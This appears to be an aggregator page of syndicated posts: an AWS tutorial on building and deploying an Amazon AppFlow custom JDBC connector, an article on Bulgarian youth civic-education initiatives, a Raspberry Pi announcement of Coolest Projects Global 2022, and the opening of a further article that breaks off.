Amazon AppFlow is a fully managed integration service that enables you to transfer data securely between software as a service (SaaS) applications like Salesforce, SAP, Zendesk, Slack, ServiceNow, and AWS services like Amazon S3 and Amazon Redshift. Amazon AppFlow lets you run enterprise-scale data flows on a schedule, in response to business events, or on-demand.

Overview diagram

Amazon AppFlow is a managed integration service that removes the heavy lifting of developing, maintaining, and updating connectors. It supports bidirectional integration between external SaaS applications and AWS services.

The Custom Connector Software Development Kit (SDK) now makes it easier to integrate with private API endpoints, proprietary applications, or other cloud services. It provides access to all available managed integrations and the ability to build your own custom integration as part of the integrated experience. The SDK is open-source and available for Java or Python.

You can deploy custom connectors built with the SDK in different ways:

  • Private – The connector is available only inside the AWS account where deployed.
  • Shared – The connector can be shared for use with other AWS accounts.
  • Public – Publish connectors on the AWS Marketplace for free or charge a subscription fee. For more information, refer to Sharing AppFlow connectors via AWS Marketplace.

Overview

This blog takes you through building and deploying your own Amazon AppFlow Custom Connector using the Java SDK. The sample application shows how to build your first custom connector with Amazon AppFlow.

Custom connector flow

The process of building, deploying, and using a custom connector is:

  1. Create a custom connector as an AWS Lambda function using the Amazon AppFlow Custom Connector SDK.
  2. Deploy the custom connector Lambda function, which provides the serverless compute for the connector.
  3. The Lambda function integrates with a SaaS application or private API.
  4. Register the custom connector with Amazon AppFlow.
  5. Users can now use this custom connector in the Amazon AppFlow service.

Building an Amazon AppFlow custom connector

The sample application used in this blog creates a new custom connector that implements a MySQL JDBC driver. With this connector, you can connect to a remote MySQL or MariaDB instance to read and write data.

The SDK allows you to build custom connectors and use the service’s built-in authentication support for OAuth2, API keys, and basic auth. For other use cases, such as JDBC, you must create your own custom authentication implementation.

The SDK includes the source code for an example Salesforce connector. This highlights a complete use case for a source and destination Amazon AppFlow connector using OAuth2 for authentication.

Details

There are three mandatory Java interfaces that a connector must implement:

  1. ConfigurationHandler.java: Defines the functionality for connector configuration and credentials-related operations.
  2. MetadataHandler.java: Defines the functionality for retrieving object metadata.
  3. RecordHandler.java: Defines the functionality for record-related CRUD operations.

Prerequisites

Ensure that the following software is installed on your workstation:

  1. Java 11
  2. Maven
  3. AWS CLI
  4. AWS SAM CLI

To run the sample application:

  1. Clone the code repository:
    git clone https://github.com/aws-samples/amazon-appflow-custom-jdbc-connector.git
    
    cd amazon-appflow-custom-jdbc-connector
  2. After cloning the sample application, review the Java classes in the project for implementation details.

To add JDBC clients for other database engines, implement the JDBCClient.java interface. The custom connector uses a Lambda function as a POJO class to handle requests. The SDK provides an abstract BaseLambdaConnectorHandler class, which you use as follows:

import com.amazonaws.appflow.custom.connector.lambda.handler.BaseLambdaConnectorHandler;

public class JDBCConnectorLambdaHandler extends BaseLambdaConnectorHandler {

  public JDBCConnectorLambdaHandler() {
    super(
      new JDBCConnectorMetadataHandler(),
      new JDBCConnectorRecordHandler(),
      new JDBCConnectorConfigurationHandler()
    );
  }
}

Local testing and debugging

While developing connector-specific functionality, developers need the ability to test and debug locally to build faster. The SDK and the example connector provide examples of testing custom connectors.

Additionally, you can experiment with JUnit and the DSL builders provided by the SDK. The JUnit tests allow you to test the implementation locally by simulating an appropriate request to the Lambda function. You can set debug points and step through the code from start to end using the built-in IDE debugger. The sample application comes with examples of JUnit tests that can be used with debug points.

Credentials management 

Amazon AppFlow stores all sensitive information in AWS Secrets Manager. The secret is created when you create a connector profile. The secret ARN is passed in the ConnectorContext that forms part of the Lambda function’s invocation request.

To test locally:

  • Mock the CredentialsProvider and stub out the response of the GetCredentials API. Note that the CredentialsProvider offers several different GetCredentials methods, depending on the authentication type used.
  • Create a secret in AWS Secrets Manager. Configure an IAM user with programmatic access and sufficient permissions to allow the secretsmanager:GetSecretValue action and let the CredentialsProvider call Secrets Manager locally. When you initialize a new service client without supplying any arguments, the SDK attempts to find AWS credentials by using the default credential provider chain.
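As a sketch of the first approach (the provider interface and helper below are hypothetical stand-ins, not the SDK’s actual classes), a local test can stub the credentials lookup so no call to Secrets Manager is made:

```python
from unittest.mock import Mock

# Hypothetical stand-in for the SDK's CredentialsProvider.
credentials_provider = Mock()
credentials_provider.get_credentials.return_value = {
    "username": "dbuser",
    "password": "dbpass",
}

def build_jdbc_url(provider, secret_arn, host, port, database):
    """Illustrative connector helper that resolves credentials by secret ARN."""
    creds = provider.get_credentials(secret_arn)
    return f"jdbc:mysql://{creds['username']}@{host}:{port}/{database}"

url = build_jdbc_url(
    credentials_provider,
    "arn:aws:secretsmanager:us-east-1:111122223333:secret:appflow-example",
    "db.example.com",
    3306,
    "sales",
)
```

The same shape works for the second approach: drop the mock and let a real provider fetch the secret through the default credential provider chain.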

For more information, read Working with AWS Credentials (SDK for Java) and Creating an IAM user with programmatic access.

Deploying the Lambda function in an AWS account

This example connector package provides an AWS Serverless Application Model (AWS SAM) template in the project folder. It describes the following resources:

  1. The Lambda function containing the custom connector code.
  2. The AWS IAM policy, allowing the function to read secrets from AWS Secrets Manager.
  3. The AWS Lambda policy permission allowing Amazon AppFlow to invoke the Lambda function.

The sample application’s AWS SAM template provides two resources:

AWSTemplateFormatVersion: '2010-09-09'
Transform: 'AWS::Serverless-2016-10-31'
Description: Template to deploy the lambda connector in your account.
Resources:
  ConnectorFunction:
    Type: 'AWS::Serverless::Function'
    Properties:
      Handler: "org.custom.connector.jdbc.handler.JDBCConnectorLambdaHandler::handleRequest"
      CodeUri: "./target/appflow-custom-jdbc-connector-jdbc-1.0.jar"
      Description: "AppFlow custom JDBC connector example"
      Runtime: java11
      Timeout: 30
      MemorySize: 1024
      Policies:
        Version: '2012-10-17'
        Statement:
          Effect: Allow
          Action: 'secretsmanager:GetSecretValue'
          Resource: !Sub 'arn:aws:secretsmanager:${AWS::Region}:${AWS::AccountId}:secret:appflow!${AWS::AccountId}-*'

  PolicyPermission:
    Type: 'AWS::Lambda::Permission'
    Properties:
      FunctionName: !GetAtt ConnectorFunction.Arn
      Action: lambda:InvokeFunction
      Principal: 'appflow.amazonaws.com'
      SourceAccount: !Ref 'AWS::AccountId'
      SourceArn: !Sub 'arn:aws:appflow:${AWS::Region}:${AWS::AccountId}:*'

Deploy this custom connector by using the following command from the amazon-appflow-custom-jdbc-connector base directory:

mvn package && sam deploy --guided

Once deployment completes, follow the steps below to register and use the connector.

Registering the custom connector

There are two ways to register the custom connector.

1. Register through the AWS Management Console

  1. From the AWS Management Console, navigate to Amazon AppFlow. Select Connectors in the left-side menu and choose Register new connector.
  2. Register the connector by selecting your Lambda function and typing in the connector label.
    Register a new connector
    The newly created custom connector Lambda function appears in the list if you deployed using AWS SAM by following the steps in this tutorial. If you deployed the Lambda function manually, ensure that the appropriate Lambda permissions are set, as described in the Lambda Permissions and Resource Policy section.
  3. Provide a label for the connector. The label must be unique per account per Region. Choose Register.
    Provide a label
  4. The connector appears in the list of custom connectors.
    List of connectors

2. Register with the API

Invoke the registerConnector public API endpoint with the following request payload:

{
   "connectorLabel":"TestCustomConnector",
   "connectorProvisioningType":"LAMBDA",
   "connectorProvisioningConfig":{
      "lambda":{ "lambdaArn":"arn:aws:lambda:<region>:<aws_account_id>:function:<lambdaFunctionName>"
      }
   }
}

For connectorLabel, use a unique label. Currently, the only supported connectorProvisioningType is LAMBDA.
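The payload can also be assembled in code. The sketch below just builds the request dictionary (the Lambda ARN is a placeholder), which maps one-to-one onto the RegisterConnector API parameters:

```python
def build_register_connector_request(label, lambda_arn):
    """Assemble a registerConnector payload for a Lambda-provisioned connector."""
    return {
        "connectorLabel": label,  # must be unique per account per Region
        "connectorProvisioningType": "LAMBDA",  # currently the only supported type
        "connectorProvisioningConfig": {"lambda": {"lambdaArn": lambda_arn}},
    }

payload = build_register_connector_request(
    "TestCustomConnector",
    "arn:aws:lambda:us-east-1:111122223333:function:JDBCConnector",  # placeholder ARN
)
# With boto3, this payload can be passed straight through:
#   boto3.client("appflow").register_connector(**payload)
```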

Using the new custom connector

  1. Navigate to the Connections link in the left menu. Select the registered connector from the drop-down.
    Selecting the connector
  2. Choose Create Connection.
    Choose Create Connection
  3. Complete the connector-specific setup:
    Setup page
  4. Proceed with creating a flow and selecting your new connection.
  5. Check the Lambda function’s Amazon CloudWatch Logs to troubleshoot any errors during connector registration, connector profile creation, and flow execution.

Production considerations

This example is a proof of concept. To build a production-ready solution, review the non-exhaustive list of differences between sample and production-ready solutions.

If you plan to use the custom connector with high concurrency, review AWS Lambda quotas and limitations.

Cleaning up the custom connector stack

To delete the connector:

  1. Delete all flows in Amazon AppFlow that you created as part of this tutorial.
  2. Delete any connector profiles.
  3. Unregister the custom connector.
  4. To delete the stack, run the following command from the amazon-appflow-custom-jdbc-connector base directory:
    sam delete

Conclusion

This blog post shows how to extend the Amazon AppFlow service to move data between SaaS endpoints and custom APIs. You can now build custom connectors using the Amazon AppFlow Custom Connector SDK.

Using custom connectors in Amazon AppFlow allows you to integrate siloed applications with minimal code. For example, different business units using legacy applications in an organization can now integrate their services via the Amazon AppFlow Custom Connector SDK.

Depending on your choice of framework, you can use the open-source Python SDK or Java SDK from GitHub. To learn more, refer to the Custom Connector SDK Developer Guide.

For more serverless learning resources, visit Serverless Land.

Democracy depends on informed participation

Post Syndicated from Йоанна Елми original https://toest.bg/demokratsiyata-zavisi-ot-osuznatoto-uchastie/

Seeing how most young people abroad are familiar with the parties, leaders, and ideologies of current political life, and how engaged they are as citizens, we realized that we want to set that kind of example too, first of all for our younger sisters.

So say Roberta Kostadinova and Viktoria Lazarova, part of the team behind „Царски Пищови“ (literally, “royal cheat sheets”), an initiative that aims to inform young Bulgarians about various aspects of Bulgarian and world politics in an engaging, accessible, and understandable way. Inspiration from abroad also lies behind another much-discussed platform, „Стража“ (roughly, “The Watch”), initially conceived as a project similar to the German Abgeordnetenwatch and later adapted to our political reality. What „Царски Пищови“ and „Стража“ have in common is not only their political focus, but also the fact that their creators are young Bulgarians who believe not merely that individual participation in civic life is worthwhile, but that this is precisely where the key to success lies.

Knowledge is power

The message of „Царски Пищови“ has from the very beginning been to encourage young people in Bulgaria to be active citizens, say Roberta and Viktoria. Although their focus is on politics and social problems at home and around the world, they aim to build a culture of being informed as an antidote to disinformation and manipulation. Contrary to the popular phrase that ignorance is bliss, they believe in a different “cliché”: that knowledge is power.

The project’s other main goal is to make political terminology, events, and news in Bulgaria accessible to people without experience or deep knowledge of the field. Hence the project’s name: the most essential content in brief, like a cheat sheet (“пищов”) at school.

We want to provoke discussion and show that on many issues there are different opinions, and that good decisions are usually the result of open debate, communication, and respect for other points of view.

The team pursues these goals by sharing graphics, illustrations, and quotes on social media, which often prompt the audience to discuss the topics at hand. Antoni Gerasimov of „Стража“ shares this view:

Democracy is not just a slogan. It is not enough to say that we live in a democracy for that to automatically place us among the countries that have achieved the most just form of government. Democracy is a complex organism made up of institutions, but also of political culture, public attitudes toward current events, and a whole host of other elements that interact and change. Neglecting any one of them gives others the upper hand and throws the whole system off balance. To live in a real democracy, it is not enough to keep repeating that our Constitution says so. So the message we are sending is very simple, yet it raises a very important point: democracy is not just a slogan, and we have a duty to take care of it so that we do not lose it.

The project works with open data, presented in understandable categories that let people see who represents them in the National Assembly and how MPs vote. The transcripts of parliamentary sittings are visualized as a chat in a phone app.

By the young, for the young?

The „Стража“ team strives to involve all citizens in the democratic process and reasons that if voting rights are acquired at 18, interest in what is happening in the country ought to emerge even earlier. The initiative wants to draw as many young people as possible into politics, but the way the project is built implies a broad reach and appeal across all age groups, says Antoni. Given that both „Стража“ and „Царски Пищови“ were built online, access to them presupposes a certain level of digital literacy. Both platforms rely on social media enough to be visible at least to Bulgarians who read their news online.

We ourselves felt the lack of adequate political and civic education when we were younger, say Roberta and Viktoria. You rarely meet people who, voting for the first time, have a clear idea of why they support a particular candidate or party. That choice is usually shaped by the views of relatives, friends, and loved ones.

That is why „Царски Пищови“ targets young people, aiming to equip them with an arsenal of knowledge on political questions. Once these basics are mastered, a person can easily build on them without being confused by terminology or by the complexity of some analyses, they believe, and they hope this foundation will help young people follow the news and grasp the essence of political problems: the first step toward more active engagement with politics and civil society in the country.

“Bulgaria has wonderful young people: energetic, active, and engaged. Although some of them are gaining experience abroad, it is striking that all are equally devoted to the cause of a better society. But it is also a fact that there are stereotypes about the young, and their opinions get dismissed as a result. Their voice somehow does not carry the same weight, owing to a ‘lack of experience’ and ‘the influence of Western culture,’ as older people often put it. Our audience is very diverse, which makes us enormously happy. We take it as a sure sign that politics and environmental and social issues are not the preserve of select groups, but the business of every citizen,” comment Roberta and Viktoria.

As for clichés about young Bulgarians at home and abroad, the „Стража“ team covers three different profiles: Blagoslav Mihaylov graduated from the University of Sheffield but returned to Bulgaria; Friedrich Krepiev still studies and lives in Germany; and Antoni Gerasimov, with whom we spoke, was educated entirely in Bulgaria. The rest of the team also have quite colorful biographies.

I know many energetic young people, and I hope there will be more and more of them, says Antoni. I would not say that studying abroad is a prerequisite for a young person to be enterprising and proactive. We live in a very dynamic, constantly changing environment, and drawing young people into political processes is inevitable. Call me a hopeless optimist, or someone living in his own bubble, but I think a qualitative change in the thinking of many young people is already a fact; what remains is for it to spread to the rest. Of course, we cannot expect 100% of young people to be engaged with politics, but I believe more and more are starting to take an interest in what is happening in the country.

A fundamental change in political consciousness

The idea of democratic participation has changed over the years. If for the generations of the second half of the 20th century civic duty meant dutiful voting and following the political process, younger people understand that duty through protests, active participation in civic life and public positions, commitment to causes, and voting on specific issues (the environment, for example) rather than for parties and ideologies. Antoni is optimistic that these processes are unfolding in Bulgaria as well:

As one of the countries of the former Eastern Bloc, Bulgaria is in the process of transforming away from the subject type of political culture that was built and imposed before 1989. Such a change is a long process, and we ourselves are part of it. It is perfectly natural to see more and more young people realizing that if they take no interest in politics, politics takes a keen interest in them. Each of us has a profession to which we have devoted our lives, but what we all share is that we are citizens, and as citizens we owe part of our time to shaping and improving the environment in which we live and want to grow.

Antoni agrees that these processes move more slowly than we would like, but he sees ever more young people who understand that no one owes them anything and that a good environment to live in depends solely on us as a society. As a university teacher, he sees a change compared with his own student days. The phenomenon of the “20-year-old socialism nostalgic,” taught by the family that the state owes them everything without their lifting a finger, is significantly rarer now, he says, and in another ten years he hopes it will disappear entirely. The state is its citizens and the institutions they have created. A change in attitudes is hard to achieve in people whose worldview is already formed. That is why it is the young who carry the new kind of political culture democracy needs: the later after 1989 you were born, the less you are shaped by society’s old habits and attitudes.

Roberta and Viktoria of „Царски Пищови“ likewise believe that, because of this historical burden, Bulgarian citizens have completely forgotten the enormous role they play in politics. They see hope in the work of numerous non-governmental and civic organizations, and they welcome the trend of more and more people finding meaning in personal example and committing to initiatives around the topics that move them, whether politics, ecology, human rights, or animal welfare. It will take time for this model of the active citizen to take root in the national mindset, but together we can achieve a great deal, they believe.

Only at the start of the process

Both undertakings are transparent about how they work. „Стража“ uses open data, and much of the team’s work consists in making the bulky, barely readable files uploaded by institutions accessible and understandable to citizens. This is done with a dedicated script that feeds the information directly into the platform.

We choose topics for our publications according to the interest they have generated during parliamentary debates, Antoni explains. The main goal is to spark curiosity that drives people to the platform to look up what interests them on their own. We are about to start publishing analyses based on quantitative research. We have so much data that it would be a shame not to establish which MP has the richest vocabulary, or what Volen Siderov’s favorite word is, right?

„Царски Пищови“ picks its topics by weighing their importance against the news, drawing on a wide range of sources, from official institutional websites to local and foreign media. They strive to stay objective and to cite all their sources so the audience can look them up and read them. They admit they certainly have gaps, and they also receive critical feedback, which they welcome as a signal that their audience consists of thinking people. “This is how civic responsibility works in practice,” they say. “Of course, there are also negative comments with no arguments and no suggestions for improvement. In those cases we try to point out how much stronger a message is when it is substantiated.”

Both teams have many plans for the future. To realize them, „Царски Пищови“ first wants to attract more people to the team, which runs entirely on volunteering, so anyone can join. “We are looking for motivated and responsible people with diverse experience, interests, and views, so that we can examine social and political news and problems from the perspective of different communities and remain accurate and objective in our publications. Age, ethnicity, and gender make no difference to us. Quite the opposite: we strive for diversity!” they say.

Ambitions run high at „Стража“ too:

Our German colleagues work with MPs who have agreed to maintain their own accounts on the site and answer questions from citizens. We believe we have the potential to be a similar link between citizens and their elected representatives. The success of such an initiative would make the platform an essential part of Bulgarian democracy, because it would create a connection between citizens and the political elite that has been missing until now.

Antoni thinks initiatives like these can build critical and demanding citizens, whatever their political preferences. He says there is no shortage of enthusiasts offering to help, which delights the team.

„Стража“ is funded solely by donations from citizens, while „Царски Пищови“ currently relies on volunteer work. These plans for the future are only the surface of both teams’ ambitions, and their optimism is, if not contagious, then at least heartening for the climate in Bulgaria. Perhaps that is why, after our conversations, I recalled Vazov’s exclamation, slightly altered: “The young, the young, long may they live!”

Cover photo: Josh Barwick / Unsplash

Source

Share your tech project with the world through Coolest Projects Global 2022

Post Syndicated from original https://www.raspberrypi.org/blog/coolest-projects-global-2022-registration-open/

It’s time for young tech creators to share with the world what they’ve made! Coolest Projects Global 2022 registration is NOW OPEN. Starting today, young people can register their technology creation on the Coolest Projects Global website, where it will be featured in the online showcase gallery for the whole world to see.

Five young coders show off their robotic garden tech project for Coolest Projects.

By registering a tech project, you’ll represent your community, and you’ll get the coolest, limited-edition swag. You may even win a prize and earn the recognition of the special project judges.

What you need to know about Coolest Projects Global

Now in its 10th year, Coolest Projects is all about celebrating young people and what they create with code. Here’s what you need to know:

  • Coolest Projects Global is completely free for all participants around the world, and it’s entirely online.
  • Coolest Projects Global is open to tech creators up to 18 years old, working independently or in teams of up to 5.
  • We welcome creators of all skill levels: this world-leading technology showcase is for young people who are coding their very first project, or who are already experienced, or anything in between.
  • You’re invited to a live online celebration, which we will live-stream in early June — more details to follow.
  • Opening today, project registration stays open until 11 May.
A young coder shows off her tech project for Coolest Projects to two other young tech creators.
  • Projects can be registered in the following categories: Scratch, games, web, mobile apps, hardware, and advanced programming.
  • Judges will evaluate projects based on their coolness, complexity, design, usability, and presentation.

Why Coolest Projects Global is so cool

Here are just a few of the reasons why young tech creators should register their project for the Coolest Projects Global showcase:

  • Share your project with the world. Coolest Projects Global is the world’s leading technology showcase for young people, and it’s your chance to shine on the global stage.
  • Get feedback on your project. A great team of judges will check out your project and give you feedback, which will land in your inbox after registration closes.
  • Earn some swag. Every creator who registers a project will be eligible to receive some limited-edition digital or physical swag. Pssst… Check out the sneak peek below.
  • Win a prize. Creators of projects that are selected as the judges’ favourites in the six showcase categories will receive a Coolest Projects medal to commemorate their accomplishment. The judges’ favourites will be announced at our live online celebration in June.
Two young coders work on their tech project on a laptop to control a sewing machine for Coolest Projects.

If you don’t have a tech project or an idea for one yet, you’ve got plenty of time to imagine and create, and we’re here to support you. Check out our guides to designing and building a tech creation — one that you’ll be proud to share with the Coolest Projects community in the online showcase gallery. And there’s no shortage of inspiration among the projects that young tech creators shared in last year’s showcase gallery.

Four young coders show off their tech project for Coolest Projects.

We have a lot more exciting stuff to share about Coolest Projects Global in the coming months, so be sure to subscribe for email updates. Until next time… be cool, creators!

""
A hint at the swag Coolest Projects Global participants will receive 👀

The post Share your tech project with the world through Coolest Projects Global 2022 appeared first on Raspberry Pi.

The Pigsty Will Fall!

Post Syndicated from original https://bivol.bg/%D0%BA%D0%BE%D1%87%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-%D0%BA%D0%B5-%D0%BF%D0%B0%D0%B4%D0%BD%D0%B5.html

Monday, 14 February 2022


The system had worked like a well-oiled machine for a long time. So long that it had turned into timelessness. We all saw that things were not right; some of us even had…
